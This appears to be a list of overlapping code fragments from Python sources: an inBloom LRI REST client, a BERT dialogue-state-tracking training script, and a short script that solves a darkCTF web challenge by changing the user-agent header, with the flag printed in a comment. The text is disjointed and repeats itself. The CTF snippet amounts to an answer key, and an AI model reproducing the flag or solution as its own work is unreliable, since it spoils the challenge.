'{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py GET property/update", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "i = hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL", "== \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont", "if resp.status==200: if not parse: return cont if not opts.has_key(\"format\") or opts[\"format\"] ==", "r = self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print", "Copyright 2012-2013 inBloom, Inc. and its affiliates. # # Licensed under the Apache", "self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not kwargs: parse", "uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts)", "its affiliates. # # Licensed under the Apache License, Version 2.0 (the \"License\");", "with the License. # You may obtain a copy of the License at", "self.port=port self.verbose=verbose self.errors = [] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to", "print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h = set() for hit", "len(args) == 4: httpmode, command, q, opts = args[0:4] elif len(args) == 3:", "at host %s port %s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True):", "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET", "else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py", "elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return None", "print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit']", "httpmode, command, q, opts = args[0:4] elif len(args) == 3: httpmode, command, q,", "if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv)", "def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit'] = pagesize r =", "law or agreed to in writing, software # distributed under the License is", "the License for the specific language governing permissions and # limitations under the", "= 'json' lq = copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits =", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "set() for hit in l: i = hit['props']['urn:lri:property_type:guid'] if i in h: print", "if not parse: return cont if not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont)", "parse: return cont if not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return j", "port %s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args,", "opts = args[0:4] elif len(args) == 3: httpmode, command, q, opts = 'GET',", "if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq", "in compliance with the License. # You may obtain a copy of the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "if i in h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__':", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not kwargs:", "opts[\"format\"] == \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return", "See the License for the specific language governing permissions and # limitations under", "[] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server at", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response'])", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "not parse: return cont if not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return", "{\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print", "opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits", "4: httpmode, command, q, opts = args[0:4] elif len(args) == 3: httpmode, command,", "= args[0:4] elif len(args) == 3: httpmode, command, q, opts = 'GET', args[0],", "self.errors = [] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to", "= [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED", "CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits)", "or opts[\"format\"] == \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\":", "return None if self.verbose: print \"REQUEST URL =\",url if resp.status==200: if not parse:", "the specific language governing permissions and # limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib", "Version 2.0 (the \"License\"); # you may not use this file except in", "except in compliance with the License. # You may obtain a copy of", "limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False):", "'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP", "opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont", "= 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers)", "opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts", "%s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs):", "i in h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60]", "self.verbose=verbose self.errors = [] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect", "return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return None", "sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize =", "cont else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq =", "./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py GET property/update '{\"guid\":\"MY_PROPERTY_GUID\",\"value\":\"MY NEW", "= True else: parse = kwargs['parse'] if len(args) == 4: httpmode, command, q,", "elif len(args) == 3: httpmode, command, q, opts = 'GET', args[0], args[1], args[2]", "to connect to server at host %s port %s.\" % (self.host,self.port)) if self.verbose:", "# limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def", "in h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p =", "print \"BAD HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST URL =\",url if", "SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if", "= {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return", "= [] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server", "return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in", "./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py", "hits def find_dupes(l): h = set() for hit in l: i = hit['props']['urn:lri:property_type:guid']", "\"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True)", "connect to server at host %s port %s.\" % (self.host,self.port)) if self.verbose: print", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "True else: parse = kwargs['parse'] if len(args) == 4: httpmode, command, q, opts", "def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server at host %s" ]
[ "import requests url = 'http://source.darkarmy.xyz/' r = requests.get(url, headers={ 'user-agent': '9e9', }) print(r.text)", "requests url = 'http://source.darkarmy.xyz/' r = requests.get(url, headers={ 'user-agent': '9e9', }) print(r.text) #", "url = 'http://source.darkarmy.xyz/' r = requests.get(url, headers={ 'user-agent': '9e9', }) print(r.text) # darkCTF{changeing_http_user_agent_is_easy}" ]
[ "FaceTracker. ============================================== FaceTracker is a library for deformable face tracking written in C++", "Python scripting language. pyfacetracker is available under the BSD License. This has no", "is available free for non-commercial use, and may be redistributed under these conditions.", "\"\"\" pyfacetracker: Python wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable", "and maintained by <NAME>. It is available free for non-commercial use, and may", "authored by <NAME> and maintained by <NAME>. It is available free for non-commercial", "comfort of the Python scripting language. pyfacetracker is available under the BSD License.", "may be redistributed under these conditions. Please see the LICENSE file for complete", "redistributed under these conditions. Please see the LICENSE file for complete details. **pyfacetracker**", "is a library for deformable face tracking written in C++ using OpenCV 2,", "has no effect on Jason's code, which is available under a separate license.", "around FaceTracker. It enables using FaceTracker while enjoyging the comfort of the Python", "enables using FaceTracker while enjoyging the comfort of the Python scripting language. pyfacetracker", "scripting language. pyfacetracker is available under the BSD License. This has no effect", "a thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging the comfort", "the comfort of the Python scripting language. pyfacetracker is available under the BSD", "LICENSE file for complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It", "FaceTracker while enjoyging the comfort of the Python scripting language. pyfacetracker is available", "<NAME>. It is available free for non-commercial use, and may be redistributed under", "Python wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable face tracking", "under a separate license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor::", "and may be redistributed under these conditions. Please see the LICENSE file for", "details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables using FaceTracker while", "of the Python scripting language. pyfacetracker is available under the BSD License. This", "use, and may be redistributed under these conditions. Please see the LICENSE file", "conditions. Please see the LICENSE file for complete details. **pyfacetracker** is a thin", "This has no effect on Jason's code, which is available under a separate", "free for non-commercial use, and may be redistributed under these conditions. Please see", "separate license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>>", "the Python scripting language. pyfacetracker is available under the BSD License. This has", "library for deformable face tracking written in C++ using OpenCV 2, authored by", "a library for deformable face tracking written in C++ using OpenCV 2, authored", "for complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables using", "while enjoyging the comfort of the Python scripting language. pyfacetracker is available under", "for non-commercial use, and may be redistributed under these conditions. Please see the", "License. This has no effect on Jason's code, which is available under a", "on Jason's code, which is available under a separate license. pyfacetracker is copyright", "pyfacetracker is available under the BSD License. This has no effect on Jason's", "license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\"", "copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from _facetracker import", "deformable face tracking written in C++ using OpenCV 2, authored by <NAME> and", "is a thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging the", "under these conditions. Please see the LICENSE file for complete details. **pyfacetracker** is", "is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from _facetracker", "BSD License. This has no effect on Jason's code, which is available under", "a separate license. pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME>", "<NAME> and maintained by <NAME>. It is available free for non-commercial use, and", "code, which is available under a separate license. pyfacetracker is copyright (C) 2012", "using FaceTracker while enjoyging the comfort of the Python scripting language. pyfacetracker is", "face tracking written in C++ using OpenCV 2, authored by <NAME> and maintained", "see the LICENSE file for complete details. **pyfacetracker** is a thin wrapper around", "the LICENSE file for complete details. **pyfacetracker** is a thin wrapper around FaceTracker.", "wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable face tracking written", "C++ using OpenCV 2, authored by <NAME> and maintained by <NAME>. It is", "available under the BSD License. This has no effect on Jason's code, which", "OpenCV 2, authored by <NAME> and maintained by <NAME>. It is available free", "Jason's code, which is available under a separate license. pyfacetracker is copyright (C)", "available under a separate license. pyfacetracker is copyright (C) 2012 by <NAME> ..", "using OpenCV 2, authored by <NAME> and maintained by <NAME>. It is available", "enjoyging the comfort of the Python scripting language. pyfacetracker is available under the", "written in C++ using OpenCV 2, authored by <NAME> and maintained by <NAME>.", "FaceTracker. It enables using FaceTracker while enjoyging the comfort of the Python scripting", "be redistributed under these conditions. Please see the LICENSE file for complete details.", "for deformable face tracking written in C++ using OpenCV 2, authored by <NAME>", "by <NAME> and maintained by <NAME>. It is available free for non-commercial use,", "FaceTracker is a library for deformable face tracking written in C++ using OpenCV", "in C++ using OpenCV 2, authored by <NAME> and maintained by <NAME>. It", "non-commercial use, and may be redistributed under these conditions. Please see the LICENSE", "wrapper around FaceTracker. It enables using FaceTracker while enjoyging the comfort of the", "file for complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables", "under the BSD License. This has no effect on Jason's code, which is", "which is available under a separate license. pyfacetracker is copyright (C) 2012 by", "these conditions. Please see the LICENSE file for complete details. **pyfacetracker** is a", "by <NAME>. It is available free for non-commercial use, and may be redistributed", "no effect on Jason's code, which is available under a separate license. pyfacetracker", "It is available free for non-commercial use, and may be redistributed under these", "effect on Jason's code, which is available under a separate license. pyfacetracker is", "(C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from _facetracker import *", "complete details. **pyfacetracker** is a thin wrapper around FaceTracker. It enables using FaceTracker", "pyfacetracker is copyright (C) 2012 by <NAME> .. codeauthor:: <NAME> <<EMAIL>> \"\"\" from", "language. pyfacetracker is available under the BSD License. This has no effect on", "the BSD License. This has no effect on Jason's code, which is available", "tracking written in C++ using OpenCV 2, authored by <NAME> and maintained by", "**pyfacetracker** is a thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging", "thin wrapper around FaceTracker. It enables using FaceTracker while enjoyging the comfort of", "is available under a separate license. pyfacetracker is copyright (C) 2012 by <NAME>", "is available under the BSD License. This has no effect on Jason's code,", "available free for non-commercial use, and may be redistributed under these conditions. Please", "It enables using FaceTracker while enjoyging the comfort of the Python scripting language.", "pyfacetracker: Python wrapper for FaceTracker. ============================================== FaceTracker is a library for deformable face", "2, authored by <NAME> and maintained by <NAME>. It is available free for", "Please see the LICENSE file for complete details. **pyfacetracker** is a thin wrapper", "for FaceTracker. ============================================== FaceTracker is a library for deformable face tracking written in", "============================================== FaceTracker is a library for deformable face tracking written in C++ using", "maintained by <NAME>. It is available free for non-commercial use, and may be" ]
[ "i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id =", "= prev_label_list + target_label_list # All slot value labels num_labels = [len(labels) for", "@classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file,", "* num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i]", "in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\",", "0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig", "in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup", "enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids", "if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None", "self.input_ids = input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id #", "\".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" +", "import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\")", "- 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0]", "in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items())", "dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors to", "0: # modify learning rate with special warm up BERT uses lr_this_step =", "dev_loss_slot = [ l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot", "'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key,", "key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else None result = {'eval_loss':", "output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval", "label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len,", "option is valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The", "embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1,", "nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot,", "- 1) assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f", "\"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys():", "\"This option is valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\",", "= len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b):", "predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name')", "Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you have", "*****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size)", "torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(", "be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. \\n\" \"Sequences", "n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ##", "in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]", "enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis:", "processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task", "all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader", "accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if __name__", "label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for", "% example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\"", "csv import os import logging import argparse import random import collections import operator", "linear learning rate warmup for. \" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\",", "all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation", "sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare model", "batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### # Prepare model if", "after tokenization. text_a = line[2] + \" # \" + text_a text_b =", "if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu()", "nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss,", "if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology =", "= input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot =", "figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn])", "logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__)", "logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size", "prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx", "Previous task target_label_list = processor.get_labels() # Slot value labels of Present task label_list", "labels of Present task label_list = prev_label_list + target_label_list # All slot value", "str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1:", "if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot = [ l *", "None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot,", "parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total", "torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features],", "str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev)", "/ nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot", "for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file,", "= 0 total_slot_class_acc = [] nlabels = 0 for sid, slot in enumerate(class_count):", "%s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### #", "= \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu >", "/ prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot =", "label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None all_padding = [0]", "prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid:", "input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in previous tasks", "% \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for", "num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] =", "slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn -> nbt,", "1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for", "eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss,", "nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex):", "in self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a,", "a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1:", "torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device =", "not args.do_eval and not args.do_analyze: 